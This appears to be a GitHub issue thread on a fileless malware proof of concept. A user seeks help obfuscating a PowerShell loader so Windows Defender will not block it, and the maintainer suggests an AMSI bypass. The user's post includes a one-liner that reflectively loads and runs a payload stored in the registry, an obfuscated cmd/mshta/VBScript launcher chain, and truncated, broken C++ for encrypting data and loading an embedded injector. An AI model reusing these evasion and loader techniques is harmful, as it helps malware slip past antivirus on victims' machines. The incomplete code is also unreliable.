Open mrapxs opened 1 month ago
This is possibly due to AMSI. It basically means that PowerShell sends your binary to AV for analysis. Try googling "AMSI bypass". I've done an implementation in my other project here. However, this won't work on a registry value due to the sheer length. That's why I used a scheduled task instead.
AMSI bypass is not implemented in this PoC, because it's just way too heavy. But you may manage to implement it.
I'm thinking it's due to string escapes, but I have NO idea. I want to obfuscate it so Windows Defender doesn't stop execution. I've tried putting the following into Invoke-Obfuscation:

```powershell
powershell "[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::CurrentUser.OpenSubKey(\"Software\\Microsoft\\Internet Explorer\").GetValue($Null)).EntryPoint.Invoke(0,$Null)"
```

and put the output in like this (omitting the base64 so it's not giant):

```cpp
LPCSTR runCommand = "CMD /C \"SET NOZ=(neW-OBJEcT io.CompREssION.dEFlatEstreAm([SystEm.iO.meMOryStREaM][SYSteM.CONVERT]::frOMBASe64StRinG('++nT09l9XJyel/'), [sYsTeM.Io.COMprESsiON.COmpRessioNmODe]::DecomPReSs) ^ | % {neW-OBJEcT SYStem.Io.STReaMrEAdeR($_, [texT.EncodING]::aScIi)} ^ | % {$_.rEaDToend()}) ^ | &($vErBOsepReFeRENcE.TOSTRIng()[1,3] + 'x' -Join '') && mshta.eXE VBScript : CReATeObJECt('WSCRIPT.ShEll').RUn('powershell . (${pshomE}[21] + ${pshoME}[34] + 'X') ((.( '{0}{1}' -f 'gC', 'i' ) ('{2}{0}{1}' -f 'nv:', 'NOZ', 'E')).'valUE')\", 1, TRue)(WINDOw.CLosE)\"";
```
But I get no output, with any type of obfuscation / encryption. Even tried encrypting at runtime, but:

```cpp
#include
#include
#include
#include
#include
#include
#include
#include
#include "../Global/NativeRegistry.h"
#include "resource.h"
#pragma comment (lib, "crypt32.lib")

bool EncryptData(const BYTE* pbData, DWORD cbData, std::vector& encryptedData)
{
    HCRYPTPROV hCryptProv = NULL;
    HCRYPTKEY hKey = NULL;
    HCRYPTHASH hHash = NULL;
    DWORD dwBlockLen;
    DWORD dwBufferLen;
    DWORD dwCount;
    bool fSuccess = false;
exit:
    if (hHash) CryptDestroyHash(hHash);
    if (hKey) CryptDestroyKey(hKey);
    if (hCryptProv) CryptReleaseContext(hCryptProv, 0);
}

int CALLBACK WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
    // Read Injector.exe from resources
    HRSRC injectorResource = FindResourceA(NULL, MAKEINTRESOURCEA(IDR_INJECTOR), "EXE");
    if (!injectorResource) return 0;
}
```
Still nothing. I'm really confused about what I'm doing wrong, tbh.